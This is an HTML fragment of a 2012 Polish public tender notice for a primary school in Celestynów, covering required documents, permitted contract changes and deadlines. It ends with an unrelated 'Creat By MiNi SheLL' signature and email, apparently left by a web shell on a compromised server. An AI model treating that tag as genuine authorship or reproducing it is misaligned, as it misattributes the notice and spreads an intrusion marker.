<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.1.1. Oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Pzp (Załącznik Nr 2 do SIWZ).
6.1.1. Wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom (Załącznik Nr 7 do SIWZ) - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.1. Zamawiający przewiduje możliwość zmiany postanowień umowy, która może nastąpić w trybie przewidzianym przez Pzp za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, z uwzględnieniem art. 144 ust. 1 Pzp, w następującym zakresie:
16.1.1. zmiany terminu płatności z przyczyn niezależnych od Zamawiającego, w tym w szczególności w wyniku zadziałania okoliczności siły wyższej,
16.1.2. wydłużenia terminu wykonania przedmiotu umowy, spowodowanego następującymi
	okolicznościami:
a) szczególnie niesprzyjającymi warunkami atmosferycznymi,
b) zawieszeniem przez Zamawiającego wykonania przedmiotu zamówienia,
c) okolicznościami siły wyższej,
d) przerwania usług  z przyczyn niezależnych od Zamawiającego i Wykonawcy,
e) zmian korzystnych dla Zamawiającego,
f) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane,
g) zmiany terminu wykonania zamówienia z przyczyn nie zależnych od Wykonawcy i Zamawiającego  wynikających z przedłużających się procedur administracyjnych na etapie wydawania opinii, uzgodnień, postanowień, decyzji itp. Niezbędnych do prawidłowego wykonania przedmiotu zamówienia,
h) zmiana terminu wykonania przedmiotu zamówienia spowodowana istotną zmianą przepisów prawnych norm lub normatywów mających wpływ na prawidłowe wykonania przedmiotu zamówienia. 
16.2. Zmiany w zakresie nazwy zadania, danych Stron, w szczególności ich adresów, przedstawicieli
	Stron, innych osób wskazanych imiennie w umowie będą dokonywane w formie pisemnej pod rygorem nieważności.
16.3. W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy.
16.4. Wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy.
16.5. Zmiany w zakresie nazwy zadania, danych Stron, w szczególności ich adresów, przedstawicieli Stron, innych osób wskazanych imiennie w umowie, nie będą traktowane jako zmiany umowy i będą dokonywane w formie jednostronnego oświadczenia Strony, której zmiana dotyczy, złożonego na piśmie pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spcelestyn.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Publicznej Szkoły Podstawowej im. Batalionu Zośka w Celestynowie, ul. Wrzosowa 42, 05-430 Celestynów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 15:30, miejsce: Sekretariat Publicznej Szkoły Podstawowej im. Batalionu Zośka w Celestynowie, ul. Wrzosowa 42, 05-430 Celestynów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com